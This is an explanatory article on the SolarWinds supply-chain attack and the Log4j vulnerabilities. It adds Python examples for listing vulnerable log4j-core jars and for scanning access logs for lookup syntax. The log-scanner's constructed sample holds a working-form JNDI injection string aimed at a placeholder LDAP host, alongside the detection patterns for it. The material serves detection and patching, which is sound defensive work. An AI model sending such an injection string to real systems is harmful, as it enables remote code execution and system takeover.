Reports of major cyberattacks make the evening (and online) news all too often. Identity theft in the millions, ransomware demanding millions, millions of people left without electricity due to an attack on the grid. Where do these attacks come from? And how?
The usual suspect is an undiscovered—until now—fault or vulnerability in a common program. The 2021 SolarWinds attack is a case in point. It was one of the most sophisticated cyberattacks ever conducted, an example of a digital supply-chain attack, in which hackers insert malicious code into trusted third-party software, thus infecting potentially all of the hacked software company’s customers.
SolarWinds, based in Austin, Texas, provides large-scale information technology infrastructure management software and services to businesses and government agencies with more than 320,000 customers in 190 countries, including 499 of the Fortune 500. The SolarWinds attack affected federal agencies, the federal courts, numerous private-sector companies, and state and local governments across the country. Government agencies confirmed to be affected by the attack include: the Depts. of Commerce, Defense, Energy, Homeland Security, Justice, Labor, State, and Treasury, as well as the National Institutes of Health.
Hackers had inserted malicious code into an update for SolarWinds’ Orion network management platform. Customers who routinely updated their Orion software unknowingly downloaded the embedded virus into their systems. Once inside, the attackers could choose which areas to access and were able to move through systems and conduct their operations undetected.
Cybersecurity agencies and companies are constantly monitoring the “Dark Net,” a term for the underbelly of the Internet where anything goes and everything has a price, for leads to newly discovered vulnerabilities in third-party software connected to the World Wide Web. As an example, in December 2021, the Apache Software Foundation found two critical vulnerabilities in its Log4j Java-based library.
The first vulnerability CVE-2021-44228, also known as Log4Shell or LogJam, was reported as an unauthenticated RCE (remote code execution) vulnerability. By exploiting how the library logs error messages, it could lead to a complete system takeover. Due to its critical nature and the ease of execution, it has received the highest possible CVSS (Common Vulnerability Scoring System) score of 10.
The second vulnerability, CVE-2021-45046, was discovered shortly after the initial exploit was patched. It is rated 3.7 out of 10 on the CVSS and would lead to a denial of service. Patches were quickly released to address both vulnerabilities.
If the problem has been patched, why worry? Log4j is the world’s most popular Java logging library and is embedded on a range of applications, services, and websites, including Apple, Amazon, Twitter, and Microsoft’s Minecraft game. Its adaptable logging capabilities make it useful across any type of infrastructure or application.
Worse, to exploit the flaw all that needs to be done is to create a line of malicious code. That code will be logged by Log4j, giving the hackers an entry point into the affected device. After that, the hackers have the means to execute arbitrary code to take possession of the entire system, including encrypting files (and holding them for ransom).
In an effort to illustrate how easy it is to exploit Log4j’s flaw, Wired magazine reported that some Twitter users were changing their names to code strings that could be used to trigger the exploit. Screenshots from the game Minecraft, too, showed players exploiting the flaw from the game’s chat function.
And the exploits didn’t take long to surface. As soon as the PoC (proof of concept) exploit was released on GitHub, hackers began actively scanning the internet for vulnerable assets. Several national cybersecurity agencies have issued warnings about the Log4j vulnerability, and there is clear evidence that hackers are developing targeted strategies to exploit the flaw. For instance, the botnet Mirai, which targets IoT-connected devices, has already created an exploit to target the flaw.
As a result, companies have been rapidly patching their software, but, as is common, it takes time and talent—and determination—to patch code. Tens of thousands of programs are still unpatched.
It’s important to recognize that the flaw is with Log4j versions 2.14.1 and below. Apache has called on all developers to install the most recent version of the library, Log4j 2.15.0. However, the potential scope of the vulnerability CVE-2021-44228 is critical. Any device or app connected to the internet running Log4j versions 2.0-2.14.1 is at risk.
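Knowing which version ranges are affected is only useful if you can find out which version is actually deployed. The following is an added example, not code from the article or from the Apache project, that walks a directory tree, finds log4j-core jars and classifies each by the ranges the article describes (2.0-2.14.1 affected by CVE-2021-44228; 2.15.0, the initial patch, still affected by CVE-2021-45046). It assumes that a Maven-built log4j-core jar carries a `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties` entry with a `version=` line, and falls back to the version in the file name; the sample jars it inspects are constructed in a temporary directory so the script runs offline.

```python
"""Added example: inventory log4j-core jars and classify them by affected version.
Not part of the article; the pom.properties layout is an assumption about
Maven-built releases, and the sample jars below are constructed for the demo."""
from __future__ import annotations

import re
import tempfile
import zipfile
from pathlib import Path

# Assumed location of the Maven metadata inside a log4j-core jar.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(v: str) -> tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' -> (2, 0, 0)."""
    parts = [int(x) for x in re.findall(r"\d+", v.split("-")[0])]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def classify(version: str) -> str:
    """Map a log4j-core version onto the ranges the article gives."""
    v = parse_version(version)
    if (2, 0, 0) <= v <= (2, 14, 1):
        return "VULNERABLE: CVE-2021-44228 (RCE); upgrade immediately"
    if v == (2, 15, 0):
        return "PARTIAL: CVE-2021-45046 (DoS, initial patch incomplete); upgrade"
    return "not in the affected ranges described; still confirm against the latest advisory"


def jar_version(jar_path: Path) -> str | None:
    """Read the version from pom.properties, else from the file name."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPS in zf.namelist():
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    m = re.search(r"log4j-core-(\d[\w.\-]*)\.jar$", jar_path.name)
    return m.group(1) if m else None


def inventory(root: Path) -> dict[str, str]:
    """Return {jar file name: classification} for every log4j-core jar under root."""
    results: dict[str, str] = {}
    for p in root.rglob("*.jar"):
        if "log4j-core" in p.name:
            ver = jar_version(p)
            results[p.name] = classify(ver) if ver else "unknown version; inspect manually"
    return results


def make_sample_jar(directory: Path, version: str, with_pom: bool) -> Path:
    """Constructed sample jar (not a real release) for the offline demo."""
    path = directory / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as zf:
        if with_pom:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        else:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return path


def run_demo() -> dict[str, str]:
    """Build two constructed jars (one with pom.properties, one without) and classify them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        make_sample_jar(root / "lib", "2.14.1", with_pom=True)
        make_sample_jar(root, "2.15.0", with_pom=False)
        return inventory(root)


if __name__ == "__main__":
    for name, verdict in sorted(run_demo().items()):
        print(f"{name}: {verdict}")
```

Point `inventory()` at an application's install directory in practice. One caveat a practitioner will hit: log4j-core is frequently bundled inside WAR, EAR or "fat" jars rather than sitting on disk as its own file, so a complete check also has to open those archives and look for the same `pom.properties` path nested inside them.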
In addition, exploiting the vulnerability is relatively straightforward. By simply sending a malicious string that then gets logged by the application, attackers can exploit a feature in Log4j that can be used to retrieve information.
The second vulnerability, CVE-2021-45046, was uncovered shortly after the initial patch was released. The initial patch was “incomplete,” and this new exploit could allow attackers to craft malicious input data using a JNDI lookup pattern, resulting in a denial of service (DoS) attack.
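Because the attack works by getting a lookup pattern into a field the application logs, the same fact gives defenders a detection signal: a benign browser or API client has no reason to send Log4j lookup syntax in a URL or header. The following is an added example, not code from the article, that scans web-server access log lines and flags any `${...}` lookup syntax, rating a JNDI lookup as high severity and any other lookup as medium. The log format and the sample lines are constructed for the demonstration; `ldap.example.invalid` is a placeholder host, not a real address.

```python
"""Added example: flag access-log lines carrying Log4j lookup syntax.
Not part of the article; the log format and sample lines are constructed."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Any "${...}" sequence is Log4j lookup syntax; seeing it in client-supplied
# data (path, query string, User-Agent) is suspicious on its own.
LOOKUP_RE = re.compile(r"\$\{")
# The JNDI lookup is the one that turns a logged string into a remote
# class-loading request on Log4j 2.0-2.14.1, so it gets the highest rating.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str  # "high" for a JNDI lookup, "medium" for other lookup syntax
    snippet: str


def scan_log(text: str) -> list[Finding]:
    """Return one Finding per log line that contains lookup syntax."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        if JNDI_RE.search(line):
            findings.append(Finding(n, "high", line.strip()))
        elif LOOKUP_RE.search(line):
            findings.append(Finding(n, "medium", line.strip()))
    return findings


def count_by_severity(findings: list[Finding]) -> dict[str, int]:
    """Summarise findings as {severity: count} for a dashboard or alert threshold."""
    return dict(Counter(f.severity for f in findings))


# Constructed sample traffic (combined-log style). Line 2 carries a JNDI lookup
# in the User-Agent field; line 3 carries a harmless-looking but still
# unexpected lookup in the query string; lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Dec/2021:13:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://ldap.example.invalid/a}"
203.0.113.12 - - [10/Dec/2021:13:02:19 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"
203.0.113.13 - - [10/Dec/2021:13:02:23 +0000] "GET /api/items HTTP/1.1" 200 2048 "-" "okhttp/4.9"
"""


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no} [{f.severity}]: {f.snippet[:90]}")
    print(count_by_severity(hits))
```

Run it over real access, proxy or application logs by reading the file into `scan_log()`. Treat a "high" hit as an incident trigger regardless of whether the server responded normally: the lookup fires when the string is logged, not when the request is served, so a 200 response says nothing about whether the host was affected.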
According to Lookout, a cybersecurity firm, there are several key actions users need to take—and that many have not taken even yet. Naturally, the prime action is to update any server, application, or resource that uses Log4j with the latest patch immediately. This patch includes coverage for both the latest DoS vulnerability and the original RCE vulnerability.
To mitigate the possibility of data exfiltration, organizations should restrict access to their apps running on IaaS (Infrastructure-as-a-Service) and on-premises data centers by implementing user-to-app segmentation.
Organizations should implement defense-in-depth strategies by closely monitoring both user and app behavior. Flagging behavior indicative of an exploit, such as an anomalous login location or an unusual file download volume, lets defenders detect and respond to malicious activity across cloud and on-prem infrastructure as well as endpoint devices.